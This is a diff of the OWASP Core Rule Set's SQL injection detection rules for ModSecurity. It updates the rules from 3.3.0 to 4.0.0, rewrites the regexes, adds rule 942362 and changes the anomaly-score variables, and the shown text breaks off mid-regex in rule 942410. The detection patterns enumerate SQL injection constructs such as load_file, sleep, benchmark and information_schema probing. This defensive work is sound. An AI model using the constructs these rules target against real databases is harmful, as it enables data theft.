(?i)\)[\s\v]*?when[\s\v]*?[0-9]+[\s\v]*?then|[\"'`][\s\v]*?(?:[#\{]|--)|/\*![\s\v]?[0-9]+|\b(?:(?:binary|cha?r)[\s\v]*?\([\s\v]*?[0-9]|(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between|r(?:egexp|like))[\s\v]+[0-9A-Z_a-z]+\()|(?:\|\||&&)[\s\v]*?[0-9A-Z_a-z]+\(" \ "id:942300,\ phase:2,\ block,\ @@ -773,20 +925,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942310.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942310.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942310.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942310 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:[\"'`](?:;\s*?(?:begin|while|if)|[\s\d]+=\s*?\d|\s+and\s*?=\W)|(?:\(\s*?select\s*?\w+|order\s+by\s+if\w*?|coalesce)\s*?\(|\w[\"'`]\s*?(?:(?:[-+=|@]+\s+?)+|[-+=|@]+)[\d(]|[\s(]+case\d*?\W.+[tw]hen[\s(]|\+\s*?\d+\s*?\+\s*?\@|\@\@\w+\s*?[^\w\s]|\W!+[\"'`]\w|\*\/from))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:\([\s\v]*?select[\s\v]*?[0-9A-Z_a-z]+|coalesce|order[\s\v]+by[\s\v]+if[0-9A-Z_a-z]*?)[\s\v]*?\(|\*/from|\+[\s\v]*?[0-9]+[\s\v]*?\+[\s\v]*?@|[0-9A-Z_a-z][\"'`][\s\v]*?(?:(?:[\+\-=@\|]+[\s\v]+?)+|[\+\-=@\|]+)[\(0-9]|@@[0-9A-Z_a-z]+[\s\v]*?[^\s\v0-9A-Z_a-z]|[^0-9A-Z_a-z]!+[\"'`][0-9A-Z_a-z]|[\"'`](?:;[\s\v]*?(?:if|while|begin)|[\s\v0-9]+=[\s\v]*?[0-9])|[\s\v\(]+case[0-9]*?[^0-9A-Z_a-z].+[tw]hen[\s\v\(]" \ "id:942310,\ phase:2,\ block,\ @@ -802,10 +951,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # # -=[ SQL Injection Probings ]=- @@ -815,15 +964,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # 942330 PL 2 # 942370 PL 2 # 942490 PL 3 -# Regexp generated from util/regexp-assemble/regexp-942330.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942330.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) -# -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:^(?:[\"'`\\\\]*?(?:[^\"'`]+[\"'`]|[\d\"'`]+)\s*?(?:n(?:and|ot)|(?:x?x)?or|between|\|\||like|and|div|&&)\s*?[\w\"'`][+&!@(),.-]|.?[\"'`]$)|\@(?:[\w-]+\s(?:between|like|x?or|and|div)\s*?[^\w\s]|\w+\s+(?:between|like|x?or|and|div)\s*?[\"'`\d]+)|[\"'`]\s*?(?:between|like|x?or|and|div)\s*?[\"'`]?\d|[^\w\s:]\s*?\d\W+[^\w\s]\s*?[\"'`].|[^\w\s]\w+\s*?[|-]\s*?[\"'`]\s*?\w|\Winformation_schema|\\\\x(?:23|27|3d)|table_name\W))" \ +# Regular expression generated from regex-assembly/942330.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942330 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\"'`][\s\v]*?\b(?:x?or|div|like|between|and)\b[\s\v]*?[\"'`]?[0-9]|\x5cx(?:2[37]|3d)|^(?:.?[\"'`]$|[\"'\x5c`]*?(?:[\"'0-9`]+|[^\"'`]+[\"'`])[\s\v]*?\b(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between|\|\||&&)\b[\s\v]*?[\"'0-9A-Z_-z][!&\(-\)\+-\.@])|[^\s\v0-9A-Z_a-z][0-9A-Z_a-z]+[\s\v]*?[\-\|][\s\v]*?[\"'`][\s\v]*?[0-9A-Z_a-z]|@(?:[0-9A-Z_a-z]+[\s\v]+(?:and|x?or|div|like|between)\b[\s\v]*?[\"'0-9`]+|[\-0-9A-Z_a-z]+[\s\v](?:and|x?or|div|like|between)\b[\s\v]*?[^\s\v0-9A-Z_a-z])|[^\s\v0-:A-Z_a-z][\s\v]*?[0-9][^0-9A-Z_a-z]+[^\s\v0-9A-Z_a-z][\s\v]*?[\"'`].|[^0-9A-Z_a-z]information_schema|table_name[^0-9A-Z_a-z]" \ "id:942330,\ phase:2,\ block,\ @@ -839,22 +985,20 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" - -# Regexp generated from util/regexp-assemble/regexp-942340.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942340.data -# Note that part of regexp-942340.data is already optimized, to avoid a -# Regexp::Assemble behaviour, where the regex is not optimized very nicely. -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) -# -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:[\"'`](?:\s*?(?:is\s*?(?:[\d.]+\s*?\W.*?[\"'`]|\d.+[\"'`]?\w)|\d\s*?(?:--|#))|(?:\W+[\w+-]+\s*?=\s*?\d\W+|\|?[\w-]{3,}[^\w\s.,]+)[\"'`]|[\%&<>^=]+\d\s*?(?:between|like|x?or|and|div|=))|(?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+(?:sounds\s+like\s*?[\"'`]|regexp\s*?\(|[=\d]+x)|in\s*?\(+\s*?select))" \ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# Regular expression generated from regex-assembly/942340.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942340 +# +# Note that part of 942340.data is already optimized, to avoid a +# Regexp::Assemble behaviour, where the regex is not optimized very nicely. +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)in[\s\v]*?\(+[\s\v]*?select|(?:(?:(?i:N)?AND|(?i:X)?(?i:X)?OR|DIV|LIKE|BETWEEN|NOT)[\s\v]+|(?:\|\||&&)[\s\v]*)[\s\v\+0-9A-Z_a-z]+(?:regexp[\s\v]*?\(|sounds[\s\v]+like[\s\v]*?[\"'`]|[0-9=]+x)|[\"'`](?:[\s\v]*?(?:[0-9][\s\v]*?(?:--|#)|is[\s\v]*?(?:[0-9].+[\"'`]?[0-9A-Z_a-z]|[\.0-9]+[\s\v]*?[^0-9A-Z_a-z].*?[\"'`]))|[%-&<->\^]+[0-9][\s\v]*?(?:=|x?or|div|like|between|and)|(?:[^0-9A-Z_a-z]+[\+\-0-9A-Z_a-z]+[\s\v]*?=[\s\v]*?[0-9][^0-9A-Z_a-z]+|\|?[\-0-9A-Z_a-z]{3,}[^\s\v,\.0-9A-Z_a-z]+)[\"'`]|[\s\v]*(?:(?:(?i:N)?AND|(?i:X)?(?i:X)?OR|DIV|LIKE|BETWEEN|NOT)[\s\v]+|(?:\|\||&&)[\s\v]*)(?:array[\s\v]*\[|[0-9A-Z_a-z]+(?:[\s\v]*!?~|[\s\v]+(?:not[\s\v]+)?similar[\s\v]+to[\s\v]+)|(?:tru|fals)e\b))|\bexcept[\s\v]+(?:select\b|values[\s\v]*?\()" \ "id:942340,\ phase:2,\ block,\ @@ -870,10 +1014,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # This rule is a stricter sibling of 942360. # The keywords 'alter' and 'union' led to false positives. @@ -895,25 +1039,53 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# This rule is a stricter sibling of 942360. +# The loose word boundaries and light context led to false positives. +# Because the stricter variant does miss quite a few legitimate payloads, the loose version was moved to PL2. +# +# Regular expression generated from regex-assembly/942362.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942362 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:alter|(?:(?:cre|trunc|upd)at|renam)e|de(?:lete|sc)|(?:inser|selec)t|load)[\s\v]+(?:char|group_concat|load_file)[\s\v]?\(?|end[\s\v]*?\);|[\s\v\(]load_file[\s\v]*?\(|[\"'`][\s\v]+regexp[^0-9A-Z_a-z]|[^A-Z_a-z][\s\v]+as\b[\s\v]*[\"'0-9A-Z_-z]+[\s\v]*\bfrom|^[^A-Z_a-z]+[\s\v]*?(?:create[\s\v]+[0-9A-Z_a-z]+|(?:d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load|(?:renam|truncat)e|u(?:pdate|nion[\s\v]*(?:all|(?:sele|distin)ct))|alter[\s\v]*(?:a(?:(?:ggregat|pplication[\s\v]*rol)e|s(?:sembl|ymmetric[\s\v]*ke)y|u(?:dit|thorization)|vailability[\s\v]*group)|b(?:roker[\s\v]*priority|ufferpool)|c(?:ertificate|luster|o(?:l(?:latio|um)|nversio)n|r(?:edential|yptographic[\s\v]*provider))|d(?:atabase|efault|i(?:mension|skgroup)|omain)|e(?:(?:ndpoi|ve)nt|xte(?:nsion|rnal))|f(?:lashback|oreign|u(?:lltext|nction))|hi(?:erarchy|stogram)|group|in(?:dex(?:type)?|memory|stance)|java|l(?:a(?:ngua|r)ge|ibrary|o(?:ckdown|g(?:file[\s\v]*group|in)))|m(?:a(?:s(?:k|ter[\s\v]*key)|terialized)|e(?:ssage[\s\v]*type|thod)|odule)|(?:nicknam|queu)e|o(?:perator|utline)|p(?:a(?:ckage|rtition)|ermission|ro(?:cedur|fil)e)|r(?:e(?:mot|sourc)e|o(?:l(?:e|lback)|ute))|s(?:chema|e(?:arch|curity|rv(?:er|ice)|quence|ssion)|y(?:mmetric[\s\v]*key|nonym)|togroup)|t(?:able(?:space)?|ext|hreshold|r(?:igger|usted)|ype)|us(?:age|er)|view|w(?:ork(?:load)?|rapper)|x(?:ml[\s\v]*schema|srobject)))\b)" \ + "id:942362,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'Detects concatenated basic SQL injection and SQLLFI attempts',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + # This rule is a sibling of 942330. See that rule for a description and overview. # # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -# Regexp generated from util/regexp-assemble/regexp-942370.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942370.data -# Note that after assemble an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942370.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942370 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\"'`](?:\s*?(?:(?:\*.+(?:(?:an|i)d|between|like|x?or|div)\W*?[\"'`]|(?:between|like|x?or|and|div)\s[^\d]+[\w-]+.*?)\d|[^\w\s?]+\s*?[^\w\s]+\s*?[\"'`]|[^\w\s]+\s*?[\W\d].*?(?:--|#))|.*?\*\s*?\d)|[()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,]|\^[\"'`])" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\"'`](?:[\s\v]*?(?:(?:\*.+(?:x?or|div|like|between|(?:an|i)d)[^0-9A-Z_a-z]*?[\"'`]|(?:x?or|div|like|between|and)[\s\v][^0-9]+[\-0-9A-Z_a-z]+.*?)[0-9]|[^\s\v0-9\?A-Z_a-z]+[\s\v]*?[^\s\v0-9A-Z_a-z]+[\s\v]*?[\"'`]|[^\s\v0-9A-Z_a-z]+[\s\v]*?[^A-Z_a-z].*?(?:#|--))|.*?\*[\s\v]*?[0-9])|\^[\"'`]|[%\(-\+\-<>][\-0-9A-Z_a-z]+[^\s\v0-9A-Z_a-z]+[\"'`][^,]" \ "id:942370,\ phase:2,\ block,\ @@ -929,17 +1101,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942380.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942380.data +# Regular expression generated from regex-assembly/942380.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942380 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\b(?:having\b ?(?:[\'\"][^=]{1,10}[\'\" ?[=<>]+|\d{1,10} ?[=<>]+)|(?i:having)\b\s+(?:'[^=]{1,10}'|\d{1,10})\s*?[=<>])|exists\s(?:s(?:elect\S(?:if(?:null)?\s\(|concat|top)|ystem\s\()|\b(?i:having)\b\s+\d{1,10}|'[^=]{1,10}'|\sselect)|(?i:\bexecute\s{1,5}[\w\.$]{1,5}\s{0,3})|(?i:\bcreate\s+?table.{0,20}?\()|(?i:\blike\W*?char\W*?\()|(?i:select.*?case)|(?i:from.*?limit)|(?i:\bexecute\()|(?i:order\sby))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:having\b(?:[\s\v]+(?:[0-9]{1,10}|'[^=]{1,10}')[\s\v]*?[<->]| ?(?:[0-9]{1,10} ?[<->]+|[\"'][^=]{1,10}[ \"'<-\?\[]+))|ex(?:ecute(?:\(|[\s\v]{1,5}[\$\.0-9A-Z_a-z]{1,5}[\s\v]{0,3})|ists[\s\v]*?\([\s\v]*?select\b)|(?:create[\s\v]+?table.{0,20}?|like[^0-9A-Z_a-z]*?char[^0-9A-Z_a-z]*?)\()|select.*?case|from.*?limit|order[\s\v]by|exists[\s\v](?:[\s\v]select|s(?:elect[^\s\v](?:if(?:null)?[\s\v]\(|top|concat)|ystem[\s\v]\()|\bhaving\b[\s\v]+[0-9]{1,10}|'[^=]{1,10}')" \ "id:942380,\ phase:2,\ block,\ @@ -955,18 +1127,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942390.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942390.data +# Regular expression generated from regex-assembly/942390.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942390 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\b(?:(?i:xor)\b\s+(?:'[^=]{1,10}'(?:\s*?[=<>])?|\d{1,10}(?:\s*?[=<>])?)|(?i:or)\b\s+(?:'[^=]{1,10}'(?:\s*?[=<>])?|\d{1,10}(?:\s*?[=<>])?))|(?i:\bor\b ?[\'\"][^=]{1,10}[\'\"] ?[=<>]+)|(?i:'\s+xor\s+.{1,20}[+\-!<>=])|(?i:'\s+or\s+.{1,20}[+\-!<>=])|(?i:\bor\b ?\d{1,10} ?[=<>]+))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:or\b(?:[\s\v]?(?:[0-9]{1,10}|[\"'][^=]{1,10}[\"'])[\s\v]?[<->]+|[\s\v]+(?:[0-9]{1,10}|'[^=]{1,10}')(?:[\s\v]*?[<->])?)|xor\b[\s\v]+(?:[0-9]{1,10}|'[^=]{1,10}')(?:[\s\v]*?[<->])?)|'[\s\v]+x?or[\s\v]+.{1,20}[!\+\-<->]" \ "id:942390,\ phase:2,\ block,\ @@ -982,21 +1153,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942400.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942400.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942400.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942400 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:\band\b(?:\s+(?:'[^=]{1,10}'(?:\s*?[=<>])?|\d{1,10}(?:\s*?[=<>])?)| ?(?:[\'\"][^=]{1,10}[\'\"]|\d{1,10}) ?[=<>]+))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\band\b(?:[\s\v]+(?:[0-9]{1,10}[\s\v]*?[<->]|'[^=]{1,10}')| ?(?:[0-9]{1,10}|[\"'][^=]{1,10}[\"']) ?[<->]+)" \ "id:942400,\ phase:2,\ block,\ @@ -1012,28 +1179,22 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # The former rule id 942410 was split into three new rules: 942410, 942470, 942480 # # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -# Regexp generated from util/regexp-assemble/regexp-942410.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942410.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output. -# And a word boundary is added before and a non-word character with an opening bracket -# is added after the Regexp::Assemble output: -# (?i:\bASSEMBLE_OUTPUT\W*?\() -# -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:\b(?:c(?:o(?:n(?:v(?:ert(?:_tz)?)?|cat(?:_ws)?|nection_id)|(?:mpres)?s|ercibility|(?:un)?t|alesce)|ur(?:rent_(?:time(?:stamp)?|date|user)|(?:dat|tim)e)|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|ast|r32)|s(?:t(?:d(?:dev(?:_(?:sam|po)p)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(?:_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha[12]?|oundex|chema|ig?n|leep|pace|qrt)|i(?:s(?:_(?:ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull)|(?:free|used)_lock)|null)?|n(?:et(?:6_(?:aton|ntoa)|_(?:aton|ntoa))|s(?:ert|tr)|terval)?|f(?:null)?)|d(?:a(?:t(?:e(?:_(?:format|add|sub)|diff)?|abase)|y(?:of(?:month|week|year)|name)?)|e(?:(?:s_(?:de|en)cryp|faul)t|grees|code)|count|ump)|l(?:o(?:ca(?:l(?:timestamp)?|te)|g(?:10|2)?|ad_file|wer)|ast(?:_(?:insert_id|day))?|e(?:(?:as|f)t|ngth)|case|trim|pad|n)|u(?:n(?:compress(?:ed_length)?|ix_timestamp|hex)|tc_(?:time(?:stamp)?|date)|p(?:datexml|per)|uid(?:_short)?|case|ser)|r(?:a(?:wto(?:nhex(?:toraw)?|hex)|dians|nd)|e(?:p(?:lace|eat)|lease_lock|verse)|o(?:w_count|und)|ight|trim|pad)|t(?:ime(?:_(?:format|to_sec)|stamp(?:diff|add)?|diff)?|o_(?:(?:second|day)s|base64|n?char)|r(?:uncate|im)|an)|m(?:a(?:ke(?:_set|date)|ster_pos_wait|x)|i(?:(?:crosecon)?d|n(?:ute)?)|o(?:nth(?:name)?|d)|d5)|f(?:i(?:eld(?:_in_set)?|nd_in_set)|rom_(?:unixtime|base64|days)|o(?:und_rows|rmat)|loor)|p(?:o(?:w(?:er)?|sition)|eriod_(?:diff|add)|rocedure_analyse|assword|g_sleep|i)|a(?:s(?:cii(?:str)?|in)|es_(?:de|en)crypt|dd(?:dat|tim)e|(?:co|b)s|tan2?|vg)|b(?:i(?:t_(?:length|count|x?or|and)|n(?:_to_num)?)|enchmark)|e(?:x(?:tract(?:value)?|p(?:ort_set)?)|nc(?:rypt|ode)|lt)|g(?:r(?:oup_conca|eates)t|et_(?:format|lock))|v(?:a(?:r(?:_(?:sam|po)p|iance)|lues)|ersion)|o(?:(?:ld_passwo)?rd|ct(?:et_length)?)|we(?:ek(?:ofyear|day)?|ight_string)|n(?:o(?:t_in|w)|ame_const|ullif)|h(?:ex(?:toraw)?|our)|qu(?:arter|ote)|year(?:week)?|xmltype)\W*?\()" \ +# Regular expression generated from regex-assembly/942410.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942410 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:a(?:(?:b|co)s|dd(?:dat|tim)e|es_(?:de|en)crypt|s(?:in|cii(?:str)?)|tan2?|vg)|b(?:enchmark|i(?:n(?:_to_num)?|t_(?:and|count|length|x?or)))|c(?:ast|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|o(?:alesce|ercibility|(?:mpres)?s|n(?:cat(?:_ws)?|nection_id|v(?:ert(?:_tz)?)?)|(?:un)?t)|r32|ur(?:(?:dat|tim)e|rent_(?:date|time(?:stamp)?|user)))|d(?:a(?:t(?:abase|e(?:_(?:add|format|sub)|diff)?)|y(?:name|of(?:month|week|year))?)|count|e(?:code|(?:faul|s_(?:de|en)cryp)t|grees)|ump)|e(?:lt|nc(?:ode|rypt)|x(?:p(?:ort_set)?|tract(?:value)?))|f(?:i(?:eld(?:_in_set)?|nd_in_set)|loor|o(?:rmat|und_rows)|rom_(?:base64|days|unixtime))|g(?:et_(?:format|lock)|r(?:eates|oup_conca)t)|h(?:ex(?:toraw)?|our)|i(?:f(?:null)?|n(?:et6?_(?:aton|ntoa)|s(?:ert|tr)|terval)?|s(?:_(?:(?:free|used)_lock|ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull))|null)?)|l(?:ast(?:_(?:day|insert_id))?|case|e(?:(?:as|f)t|ngth)|n|o(?:ad_file|ca(?:l(?:timestamp)?|te)|g(?:10|2)?|wer)|pad|trim)|m(?:a(?:ke(?:date|_set)|ster_pos_wait|x)|d5|i(?:(?:crosecon)?d|n(?:ute)?)|o(?:d|nth(?:name)?))|n(?:ame_const|o(?:t_in|w)|ullif